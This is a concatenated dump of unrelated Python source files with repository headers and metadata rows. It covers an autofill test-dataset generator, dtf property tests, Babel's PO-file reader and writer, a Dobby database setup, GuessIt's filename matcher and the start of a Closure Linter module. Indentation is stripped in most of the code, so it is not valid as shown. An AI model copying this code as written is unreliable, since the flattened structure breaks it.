# These zip codes are now matched to the corresponding cities in
# city_construct.
zip_construct = [ u'95110', u'94109', u'94203', u'90120']
logger = logging.getLogger(__name__)
logger.addHandler(NullHandler())
log_handlers = {'StreamHandler': None}
def __init__(self, output_filename=None, logging_level=None):
"""Constructs dataset generator object.
Creates 'fields' data member which is a list of pair (two values) lists.
    These pairs are comprised of a field key, e.g. u'NAME_FIRST', and a
    generator method, e.g. self.GenerateNameFirst, which will generate the
    value. If we want the value to always be the same, e.g. u'John', we can
    use a literal value instead of a method. We can even use the None keyword,
    which will give a value of u''.
'output_pattern' for one field would have been: "{u'NAME_FIRST': u'%s',}"
which is ready to accept a value for the 'NAME_FIRST' field key once
this value is generated.
'output_pattern' is used in 'GenerateNextDict()' to generate the next
dict line.
Args:
output_filename: specified filename of generated dataset to be saved.
Default value is None and no saving takes place.
logging_level: set verbosity levels, default is None.
"""
if logging_level:
if not self.log_handlers['StreamHandler']:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
self.log_handlers['StreamHandler'] = console
self.logger.addHandler(console)
self.logger.setLevel(logging_level)
else:
if self.log_handlers['StreamHandler']:
self.logger.removeHandler(self.log_handlers['StreamHandler'])
self.log_handlers['StreamHandler'] = None
self.output_filename = output_filename
self.dict_no = 0
self.fields = [
[u'NAME_FIRST', self.GenerateNameFirst],
[u'NAME_MIDDLE', None],
[u'NAME_LAST', None],
[u'EMAIL_ADDRESS', self.GenerateEmail],
[u'COMPANY_NAME', None],
[u'ADDRESS_HOME_LINE1', self.GenerateAddress],
[u'ADDRESS_HOME_LINE2', None],
[u'ADDRESS_HOME_CITY', self.GenerateCity],
[u'ADDRESS_HOME_STATE', self.GenerateState],
[u'ADDRESS_HOME_ZIP', self.GenerateZip],
[u'ADDRESS_HOME_COUNTRY', u'United States'],
[u'PHONE_HOME_WHOLE_NUMBER', None],
]
self.next_dict = {}
    # Using implicit line joining does not work well in this case, as each
    # element has to be a string and not a function call that may return one.
self.output_pattern = u'{\'' + \
u', '.join([u'u"%s" : u"%%s"' % key for key, method in self.fields]) + \
u',}'
def _GenerateField(self, field_construct):
"""Generates each field in each dictionary.
Args:
field_construct: it is a list of lists.
The first value (index 0) of each containing list is a function or None.
The remaining values are the args. If function is None then arg is just
returned.
Example 1: zip_construct = [[ None, u'95110']]. There is one
containing list only and function here is None and arg is u'95110'.
This just returns u'95110'.
Example 2: address_construct = [ [ random.randint, 1, 10000],
[ None, u'foobar'] ] This has two containing lists and it will return
the result of:
random.randint(1, 10000) + ' ' + u'foobar'
which could be u'7832 foobar'
"""
parts = []
for function_and_args in field_construct:
function = function_and_args[0]
args = function_and_args[1:]
if not function:
function = lambda x: x
parts.append(str(function(*args)))
return (' ').join(parts)
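  # Worked example (actual values depend on the seeded RNG): for
  # address_construct, each [function, args...] entry is evaluated and the
  # results are joined with spaces, so a possible output is u'7832 foobar St #2'.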
def GenerateAddress(self):
"""Uses _GenerateField() and address_construct to gen a random address.
Returns:
A random address.
"""
return self._GenerateField(self.address_construct)
def GenerateCity(self):
"""Uses _GenerateField() and city_construct to gen a random city.
Returns:
A random city.
"""
return self._GenerateField(self.city_construct)
def GenerateState(self):
"""Uses _GenerateField() and state_construct to generate a state.
Returns:
A state.
"""
return self._GenerateField(self.state_construct)
def GenerateZip(self):
"""Uses zip_construct and generated cities to return a matched zip code.
Returns:
A zip code matched to the corresponding city.
"""
city_selected = self.next_dict['ADDRESS_HOME_CITY'][0]
index = self.city_construct[0][1].index(city_selected)
return self.zip_construct[index]
def GenerateCountry(self):
"""Uses _GenerateField() and country_construct to generate a country.
Returns:
A country.
"""
return self._GenerateField(self.country_construct)
def GenerateNameFirst(self):
"""Generates a numerical first name.
The name is the number of the current dict.
i.e. u'1', u'2', u'3'
Returns:
A numerical first name.
"""
return u'%s' % self.dict_no
def GenerateEmail(self):
"""Generates an email that corresponds to the first name.
i.e. u'1@example.com', u'2@example.com', u'3@example.com'
Returns:
An email address that corresponds to the first name.
"""
return u'%s@example.com' % self.dict_no
def GenerateNextDict(self):
"""Generates next dictionary of the dataset.
Returns:
The output dictionary.
"""
self.dict_no += 1
self.next_dict = {}
for key, method_or_value in self.fields:
if not method_or_value:
self.next_dict[key] = ['']
elif type(method_or_value) in [str, unicode]:
self.next_dict[key] = ['%s' % method_or_value]
else:
self.next_dict[key] = [method_or_value()]
return self.next_dict
def GenerateDataset(self, num_of_dict_to_generate=10):
"""Generates a list of dictionaries.
Args:
num_of_dict_to_generate: The number of dictionaries to be generated.
Default value is 10.
Returns:
The dictionary list.
"""
random.seed(0) # All randomly generated values are reproducible.
if self.output_filename:
output_file = codecs.open(
self.output_filename, mode='wb', encoding='utf-8-sig')
else:
output_file = None
try:
list_of_dict = []
if output_file:
output_file.write('[')
output_file.write(os.linesep)
while self.dict_no < num_of_dict_to_generate:
output_dict = self.GenerateNextDict()
list_of_dict.append(output_dict)
output_line = self.output_pattern % tuple(
[output_dict[key] for key, method in self.fields])
if output_file:
output_file.write(output_line)
output_file.write(os.linesep)
self.logger.info(
'%d: [%s]' % (self.dict_no, output_line.encode(sys.stdout.encoding,
'ignore')))
if output_file:
output_file.write(']')
output_file.write(os.linesep)
self.logger.info('%d dictionaries generated SUCCESSFULLY!', self.dict_no)
self.logger.info('--- FINISHED ---')
return list_of_dict
finally:
if output_file:
output_file.close()
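  # Programmatic usage sketch (no output file; results are reproducible
  # because the RNG is seeded with 0):
  #
  #   gen = DatasetGenerator(logging_level=logging.INFO)
  #   profiles = gen.GenerateDataset(num_of_dict_to_generate=5)
  #   print(profiles[0]['NAME_FIRST'])  # [u'1']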
def main():
parser = OptionParser()
parser.add_option(
'-o', '--output', dest='output_filename', default='',
help='write output to FILE [optional]', metavar='FILE')
parser.add_option(
'-d', '--dict', type='int', dest='dict_no', metavar='DICT_NO', default=10,
help='DICT_NO: number of dictionaries to be generated [default: %default]')
parser.add_option(
'-l', '--log_level', dest='log_level', default='debug',
metavar='LOG_LEVEL',
help='LOG_LEVEL: "debug", "info", "warning" or "error" [default: %default]')
(options, args) = parser.parse_args()
if args:
parser.print_help()
return 1
options.log_level = options.log_level.lower()
if options.log_level not in ['debug', 'info', 'warning', 'error']:
parser.error('Wrong log_level argument.')
parser.print_help()
else:
if options.log_level == 'debug':
options.log_level = logging.DEBUG
elif options.log_level == 'info':
options.log_level = logging.INFO
elif options.log_level == 'warning':
options.log_level = logging.WARNING
elif options.log_level == 'error':
options.log_level = logging.ERROR
gen = DatasetGenerator(options.output_filename, options.log_level)
gen.GenerateDataset(options.dict_no)
return 0
if __name__ == '__main__':
sys.exit(main())
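# Command-line usage sketch, mirroring the option parser above:
#
#   python autofill_dataset_generator.py -d 5 -o dataset.txt -l info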
# ==============================================================================
# File: python-dtf/tests/unit/test_prop.py
# Repo: jakev/dtf (license: Apache-2.0)
# ==============================================================================
# Android Device Testing Framework ("dtf")
# Copyright 2013-2016 Jake Valletta (@jake_valletta)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""pytest for using dtf property manager"""
from __future__ import absolute_import
import pytest
import dtf.properties as prop
import dtf.testutils as testutils
# prop_set() tests
def test_set_new_property():
"""Attempt to set a new property (existing section)"""
value = '1'
contents = ("[info]\n"
"real = not_real")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
def test_set_new_section_property():
"""Set a property that has no section (yet)"""
value = '1'
testutils.deploy_config_raw("")
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_existing_property():
"""Set a property that already exists"""
value = 'new'
contents = ("[Info]\n"
"sdk = old")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_property_casing():
"""Set a prop and try to retrieve with casing"""
sdk = '1'
testutils.deploy_config_raw("")
prop.set_prop('INFO', 'sdk', sdk)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_get() tests
def test_get_empty_config():
"""Attempts to get a property without a valid config"""
testutils.deploy_config_raw("")
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property():
"""Attempts to get a valid property"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
testutils.undeploy()
return 0
def test_get_property_no_option():
"""Attempt to get property that doesnt exist"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property_casing():
"""Get a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_del() tests
def test_del_empty_config():
"""Attempts to delete a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property():
"""Attempts to delete a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_del_property_invalid():
"""Attempts to delete a property that doesnt exist"""
contents = ("[Info]\n"
"vmtype = 64")
testutils.deploy_config_raw(contents)
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property_casing():
"""Delete a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
# prop_test() tests
def test_test_empty_config():
"""Test a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property():
"""Test a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
def test_test_invalid_property():
"""Test a missingproperty"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property_casing():
"""Test a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
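# Running these tests (pytest discovers the test_* functions above):
#
#   pytest python-dtf/tests/unit/test_prop.py -v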
# ==============================================================================
# File: bp_includes/external/babel/messages/pofile.py
# Repo: krismcfarlin/todo_angular_endpoints_sockets (license: LGPL-3.0)
# ==============================================================================
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
"""Reading and writing of files in the ``gettext`` PO (portable object)
format.
:see: `The Format of PO Files
<http://www.gnu.org/software/gettext/manual/gettext.html#PO-Files>`_
"""
from datetime import date, datetime
import os
import re
from babel import __version__ as VERSION
from babel.messages.catalog import Catalog, Message
from babel.util import set, wraptext, LOCALTZ
__all__ = ['read_po', 'write_po']
__docformat__ = 'restructuredtext en'
def unescape(string):
r"""Reverse `escape` the given string.
>>> print unescape('"Say:\\n \\"hello, world!\\"\\n"')
Say:
"hello, world!"
<BLANKLINE>
:param string: the string to unescape
:return: the unescaped string
:rtype: `str` or `unicode`
"""
return string[1:-1].replace('\\\\', '\\') \
.replace('\\t', '\t') \
.replace('\\r', '\r') \
.replace('\\n', '\n') \
.replace('\\"', '\"')
def denormalize(string):
r"""Reverse the normalization done by the `normalize` function.
>>> print denormalize(r'''""
... "Say:\n"
... " \"hello, world!\"\n"''')
Say:
"hello, world!"
<BLANKLINE>
>>> print denormalize(r'''""
... "Say:\n"
... " \"Lorem ipsum dolor sit "
... "amet, consectetur adipisicing"
... " elit, \"\n"''')
Say:
"Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
<BLANKLINE>
:param string: the string to denormalize
:return: the denormalized string
:rtype: `unicode` or `str`
"""
if string.startswith('""'):
lines = []
for line in string.splitlines()[1:]:
lines.append(unescape(line))
return ''.join(lines)
else:
return unescape(string)
def read_po(fileobj, locale=None, domain=None, ignore_obsolete=False):
"""Read messages from a ``gettext`` PO (portable object) file from the given
file-like object and return a `Catalog`.
>>> from StringIO import StringIO
>>> buf = StringIO('''
... #: main.py:1
... #, fuzzy, python-format
... msgid "foo %(name)s"
... msgstr ""
...
... # A user comment
... #. An auto comment
... #: main.py:3
... msgid "bar"
... msgid_plural "baz"
... msgstr[0] ""
... msgstr[1] ""
... ''')
>>> catalog = read_po(buf)
>>> catalog.revision_date = datetime(2007, 04, 01)
>>> for message in catalog:
... if message.id:
... print (message.id, message.string)
... print ' ', (message.locations, message.flags)
... print ' ', (message.user_comments, message.auto_comments)
(u'foo %(name)s', '')
([(u'main.py', 1)], set([u'fuzzy', u'python-format']))
([], [])
((u'bar', u'baz'), ('', ''))
([(u'main.py', 3)], set([]))
([u'A user comment'], [u'An auto comment'])
:param fileobj: the file-like object to read the PO file from
:param locale: the locale identifier or `Locale` object, or `None`
if the catalog is not bound to a locale (which basically
means it's a template)
:param domain: the message domain
:param ignore_obsolete: whether to ignore obsolete messages in the input
    :return: a `Catalog` object representing the parsed PO file
    :rtype: `Catalog`
"""
catalog = Catalog(locale=locale, domain=domain)
counter = [0]
offset = [0]
messages = []
translations = []
locations = []
flags = []
user_comments = []
auto_comments = []
obsolete = [False]
in_msgid = [False]
in_msgstr = [False]
def _add_message():
translations.sort()
if len(messages) > 1:
msgid = tuple([denormalize(m) for m in messages])
else:
msgid = denormalize(messages[0])
if isinstance(msgid, (list, tuple)):
string = []
for idx in range(catalog.num_plurals):
try:
string.append(translations[idx])
except IndexError:
string.append((idx, ''))
string = tuple([denormalize(t[1]) for t in string])
else:
string = denormalize(translations[0][1])
message = Message(msgid, string, list(locations), set(flags),
auto_comments, user_comments, lineno=offset[0] + 1)
if obsolete[0]:
if not ignore_obsolete:
catalog.obsolete[msgid] = message
else:
catalog[msgid] = message
del messages[:]; del translations[:]; del locations[:];
del flags[:]; del auto_comments[:]; del user_comments[:]
obsolete[0] = False
counter[0] += 1
def _process_message_line(lineno, line):
if line.startswith('msgid_plural'):
in_msgid[0] = True
msg = line[12:].lstrip()
messages.append(msg)
elif line.startswith('msgid'):
in_msgid[0] = True
offset[0] = lineno
txt = line[5:].lstrip()
if messages:
_add_message()
messages.append(txt)
elif line.startswith('msgstr'):
in_msgid[0] = False
in_msgstr[0] = True
msg = line[6:].lstrip()
if msg.startswith('['):
idx, msg = msg[1:].split(']', 1)
translations.append([int(idx), msg.lstrip()])
else:
translations.append([0, msg])
elif line.startswith('"'):
if in_msgid[0]:
messages[-1] += u'\n' + line.rstrip()
elif in_msgstr[0]:
translations[-1][1] += u'\n' + line.rstrip()
for lineno, line in enumerate(fileobj.readlines()):
line = line.strip()
if not isinstance(line, unicode):
line = line.decode(catalog.charset)
if line.startswith('#'):
in_msgid[0] = in_msgstr[0] = False
if messages and translations:
_add_message()
if line[1:].startswith(':'):
for location in line[2:].lstrip().split():
pos = location.rfind(':')
if pos >= 0:
try:
lineno = int(location[pos + 1:])
except ValueError:
continue
locations.append((location[:pos], lineno))
elif line[1:].startswith(','):
for flag in line[2:].lstrip().split(','):
flags.append(flag.strip())
elif line[1:].startswith('~'):
obsolete[0] = True
_process_message_line(lineno, line[2:].lstrip())
elif line[1:].startswith('.'):
# These are called auto-comments
comment = line[2:].strip()
if comment: # Just check that we're not adding empty comments
auto_comments.append(comment)
else:
# These are called user comments
user_comments.append(line[1:].strip())
else:
_process_message_line(lineno, line)
if messages:
_add_message()
# No actual messages found, but there was some info in comments, from which
# we'll construct an empty header message
elif not counter[0] and (flags or user_comments or auto_comments):
messages.append(u'')
translations.append([0, u''])
_add_message()
return catalog
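# Round-trip sketch (in-memory buffers; Python 2 idioms to match this module;
# write_po is defined further below):
#
#   from StringIO import StringIO
#   catalog = read_po(StringIO('msgid "hello"\nmsgstr "bonjour"\n'), locale='fr')
#   out = StringIO()
#   write_po(out, catalog, omit_header=True)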
WORD_SEP = re.compile('('
r'\s+|' # any whitespace
r'[^\s\w]*\w+[a-zA-Z]-(?=\w+[a-zA-Z])|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w)' # em-dash
')')
def escape(string):
r"""Escape the given string so that it can be included in double-quoted
strings in ``PO`` files.
>>> escape('''Say:
... "hello, world!"
... ''')
'"Say:\\n \\"hello, world!\\"\\n"'
:param string: the string to escape
:return: the escaped string
:rtype: `str` or `unicode`
"""
return '"%s"' % string.replace('\\', '\\\\') \
.replace('\t', '\\t') \
.replace('\r', '\\r') \
.replace('\n', '\\n') \
.replace('\"', '\\"')
def normalize(string, prefix='', width=76):
r"""Convert a string into a format that is appropriate for .po files.
>>> print normalize('''Say:
... "hello, world!"
... ''', width=None)
""
"Say:\n"
" \"hello, world!\"\n"
>>> print normalize('''Say:
... "Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
... ''', width=32)
""
"Say:\n"
" \"Lorem ipsum dolor sit "
"amet, consectetur adipisicing"
" elit, \"\n"
:param string: the string to normalize
:param prefix: a string that should be prepended to every line
:param width: the maximum line width; use `None`, 0, or a negative number
to completely disable line wrapping
:return: the normalized string
:rtype: `unicode`
"""
if width and width > 0:
prefixlen = len(prefix)
lines = []
for idx, line in enumerate(string.splitlines(True)):
if len(escape(line)) + prefixlen > width:
chunks = WORD_SEP.split(line)
chunks.reverse()
while chunks:
buf = []
size = 2
while chunks:
l = len(escape(chunks[-1])) - 2 + prefixlen
if size + l < width:
buf.append(chunks.pop())
size += l
else:
if not buf:
# handle long chunks by putting them on a
# separate line
buf.append(chunks.pop())
break
lines.append(u''.join(buf))
else:
lines.append(line)
else:
lines = string.splitlines(True)
if len(lines) <= 1:
return escape(string)
# Remove empty trailing line
if lines and not lines[-1]:
del lines[-1]
lines[-1] += '\n'
return u'""\n' + u'\n'.join([(prefix + escape(l)) for l in lines])
def write_po(fileobj, catalog, width=76, no_location=False, omit_header=False,
sort_output=False, sort_by_file=False, ignore_obsolete=False,
include_previous=False):
r"""Write a ``gettext`` PO (portable object) template file for a given
message catalog to the provided file-like object.
>>> catalog = Catalog()
>>> catalog.add(u'foo %(name)s', locations=[('main.py', 1)],
... flags=('fuzzy',))
>>> catalog.add((u'bar', u'baz'), locations=[('main.py', 3)])
>>> from StringIO import StringIO
>>> buf = StringIO()
>>> write_po(buf, catalog, omit_header=True)
>>> print buf.getvalue()
#: main.py:1
#, fuzzy, python-format
msgid "foo %(name)s"
msgstr ""
<BLANKLINE>
#: main.py:3
msgid "bar"
msgid_plural "baz"
msgstr[0] ""
msgstr[1] ""
<BLANKLINE>
<BLANKLINE>
:param fileobj: the file-like object to write to
:param catalog: the `Catalog` instance
:param width: the maximum line width for the generated output; use `None`,
0, or a negative number to completely disable line wrapping
:param no_location: do not emit a location comment for every message
:param omit_header: do not include the ``msgid ""`` entry at the top of the
output
:param sort_output: whether to sort the messages in the output by msgid
:param sort_by_file: whether to sort the messages in the output by their
locations
:param ignore_obsolete: whether to ignore obsolete messages and not include
them in the output; by default they are included as
comments
:param include_previous: include the old msgid as a comment when
updating the catalog
"""
def _normalize(key, prefix=''):
return normalize(key, prefix=prefix, width=width) \
.encode(catalog.charset, 'backslashreplace')
def _write(text):
if isinstance(text, unicode):
text = text.encode(catalog.charset)
fileobj.write(text)
def _write_comment(comment, prefix=''):
# xgettext always wraps comments even if --no-wrap is passed;
# provide the same behaviour
if width and width > 0:
_width = width
else:
_width = 76
for line in wraptext(comment, _width):
_write('#%s %s\n' % (prefix, line.strip()))
def _write_message(message, prefix=''):
if isinstance(message.id, (list, tuple)):
_write('%smsgid %s\n' % (prefix, _normalize(message.id[0], prefix)))
_write('%smsgid_plural %s\n' % (
prefix, _normalize(message.id[1], prefix)
))
for idx in range(catalog.num_plurals):
try:
string = message.string[idx]
except IndexError:
string = ''
_write('%smsgstr[%d] %s\n' % (
prefix, idx, _normalize(string, prefix)
))
else:
_write('%smsgid %s\n' % (prefix, _normalize(message.id, prefix)))
_write('%smsgstr %s\n' % (
prefix, _normalize(message.string or '', prefix)
))
messages = list(catalog)
if sort_output:
messages.sort()
elif sort_by_file:
        messages.sort(lambda x, y: cmp(x.locations, y.locations))
for message in messages:
if not message.id: # This is the header "message"
if omit_header:
continue
comment_header = catalog.header_comment
if width and width > 0:
lines = []
for line in comment_header.splitlines():
lines += wraptext(line, width=width,
subsequent_indent='# ')
comment_header = u'\n'.join(lines) + u'\n'
_write(comment_header)
for comment in message.user_comments:
_write_comment(comment)
for comment in message.auto_comments:
_write_comment(comment, prefix='.')
if not no_location:
locs = u' '.join([u'%s:%d' % (filename.replace(os.sep, '/'), lineno)
for filename, lineno in message.locations])
_write_comment(locs, prefix=':')
if message.flags:
_write('#%s\n' % ', '.join([''] + list(message.flags)))
if message.previous_id and include_previous:
_write_comment('msgid %s' % _normalize(message.previous_id[0]),
prefix='|')
if len(message.previous_id) > 1:
_write_comment('msgid_plural %s' % _normalize(
message.previous_id[1]
), prefix='|')
_write_message(message)
_write('\n')
if not ignore_obsolete:
for message in catalog.obsolete.values():
for comment in message.user_comments:
_write_comment(comment)
_write_message(message, prefix='#~ ')
_write('\n')
| lgpl-3.0 | -1,596,174,504,952,294,000 | 34.177632 | 80 | 0.520541 | false |
Diaoul/Dobby | dobby/db.py | 1 | 1627 | # Copyright 2011 Antoine Bertin <diaoulael@gmail.com>
#
# This file is part of Dobby.
#
# Dobby is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dobby is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Dobby. If not, see <http://www.gnu.org/licenses/>.
from models import Base
from models.actions import Action
from models.actions.datetime import Datetime
from models.actions.feed import Feed
from models.actions.weather import Weather
from models.association import Association
from models.command import Command
from models.scenario import Scenario
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm.session import sessionmaker
import logging
import os
logger = logging.getLogger(__name__)
def initDb(path):
"""Initialize database (create/update) and returns a sessionmaker to it
:return: a session maker object
:rtype: SessionMaker
"""
logger.info(u'Initializing database')
engine = create_engine('sqlite:///' + path)
if not os.path.exists(path):
logger.debug(u'Database does not exist, creating...')
Base.metadata.create_all(engine)
return sessionmaker(bind=engine)
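# A minimal usage sketch, assuming a writable database location (the path
# below is hypothetical):
#
#     Session = initDb('/var/lib/dobby/dobby.db')
#     session = Session()
#     scenarios = session.query(Scenario).all()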
| lgpl-3.0 | 8,909,125,431,581,416,000 | 33.617021 | 75 | 0.76091 | false |
nomaro/SickBeard_Backup | lib/guessit/matcher.py | 40 | 6496 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2012 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import PY3, u, base_text_type
from guessit.matchtree import MatchTree
from guessit.textutils import normalize_unicode
import logging
log = logging.getLogger(__name__)
class IterativeMatcher(object):
def __init__(self, filename, filetype='autodetect', opts=None):
"""An iterative matcher tries to match different patterns that appear
in the filename.
The 'filetype' argument indicates which type of file you want to match.
If it is 'autodetect', the matcher will try to see whether it can guess
that the file corresponds to an episode, or otherwise will assume it is
a movie.
The recognized 'filetype' values are:
[ autodetect, subtitle, movie, moviesubtitle, episode, episodesubtitle ]
The IterativeMatcher works mainly in 2 steps:
First, it splits the filename into a match_tree, which is a tree of groups
which have a semantic meaning, such as episode number, movie title,
etc...
The match_tree created looks like the following:
0000000000000000000000000000000000000000000000000000000000000000000000000000000000 111
0000011111111111112222222222222233333333444444444444444455555555666777777778888888 000
0000000000000000000000000000000001111112011112222333333401123334000011233340000000 000
__________________(The.Prestige).______.[____.HP.______.{__-___}.St{__-___}.Chaps].___
xxxxxttttttttttttt ffffff vvvv xxxxxx ll lll xx xxx ccc
[XCT].Le.Prestige.(The.Prestige).DVDRip.[x264.HP.He-Aac.{Fr-Eng}.St{Fr-Eng}.Chaps].mkv
The first 3 lines indicates the group index in which a char in the
filename is located. So for instance, x264 is the group (0, 4, 1), and
        it corresponds to a video codec, denoted by the letter 'v' in the 4th line.
(for more info, see guess.matchtree.to_string)
Second, it tries to merge all this information into a single object
containing all the found properties, and does some (basic) conflict
resolution when they arise.
"""
valid_filetypes = ('autodetect', 'subtitle', 'video',
'movie', 'moviesubtitle',
'episode', 'episodesubtitle')
if filetype not in valid_filetypes:
raise ValueError("filetype needs to be one of %s" % valid_filetypes)
if not PY3 and not isinstance(filename, unicode):
log.warning('Given filename to matcher is not unicode...')
filename = filename.decode('utf-8')
filename = normalize_unicode(filename)
if opts is None:
opts = []
elif isinstance(opts, base_text_type):
opts = opts.split()
self.match_tree = MatchTree(filename)
mtree = self.match_tree
mtree.guess.set('type', filetype, confidence=1.0)
def apply_transfo(transfo_name, *args, **kwargs):
transfo = __import__('guessit.transfo.' + transfo_name,
globals=globals(), locals=locals(),
fromlist=['process'], level=0)
transfo.process(mtree, *args, **kwargs)
# 1- first split our path into dirs + basename + ext
apply_transfo('split_path_components')
# 2- guess the file type now (will be useful later)
apply_transfo('guess_filetype', filetype)
if mtree.guess['type'] == 'unknown':
return
# 3- split each of those into explicit groups (separated by parentheses
# or square brackets)
apply_transfo('split_explicit_groups')
# 4- try to match information for specific patterns
# NOTE: order needs to comply to the following:
# - website before language (eg: tvu.org.ru vs russian)
# - language before episodes_rexps
# - properties before language (eg: he-aac vs hebrew)
# - release_group before properties (eg: XviD-?? vs xvid)
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps',
'guess_episodes_rexps', 'guess_weak_episodes_rexps' ]
else:
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps' ]
if 'nolanguage' in opts:
strategy.remove('guess_language')
for name in strategy:
apply_transfo(name)
# more guessers for both movies and episodes
for name in ['guess_bonus_features', 'guess_year']:
apply_transfo(name)
if 'nocountry' not in opts:
apply_transfo('guess_country')
# split into '-' separated subgroups (with required separator chars
# around the dash)
apply_transfo('split_on_dash')
# 5- try to identify the remaining unknown groups by looking at their
# position relative to other known elements
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
apply_transfo('guess_episode_info_from_position')
else:
apply_transfo('guess_movie_title_from_position')
# 6- perform some post-processing steps
apply_transfo('post_process')
log.debug('Found match tree:\n%s' % u(mtree))
def matched(self):
return self.match_tree.matched()
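# A minimal usage sketch (the filename below is made up). The matcher builds
# the match tree described in the docstring above and merges its findings
# into a single guess:
#
#     matcher = IterativeMatcher(u'Show.Name.S01E02.720p.HDTV.x264-GRP.mkv',
#                                filetype='episode')
#     guess = matcher.matched()  # e.g. contains season, episodeNumber, ...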
| gpl-3.0 | 5,704,064,265,243,028,000 | 40.909677 | 94 | 0.628695 | false |
markYoungH/chromium.src | third_party/closure_linter/closure_linter/errorrules.py | 124 | 2276 | #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Linter error rules class for Closure Linter."""
__author__ = 'robbyw@google.com (Robert Walker)'
import gflags as flags
from closure_linter import errors
FLAGS = flags.FLAGS
flags.DEFINE_boolean('jsdoc', True,
'Whether to report errors for missing JsDoc.')
flags.DEFINE_list('disable', None,
'Disable specific error. Usage Ex.: gjslint --disable 1,'
'0011 foo.js.')
flags.DEFINE_integer('max_line_length', 80, 'Maximum line length allowed '
'without warning.', lower_bound=1)
disabled_error_nums = None
def GetMaxLineLength():
"""Returns allowed maximum length of line.
Returns:
Length of line allowed without any warning.
"""
return FLAGS.max_line_length
def ShouldReportError(error):
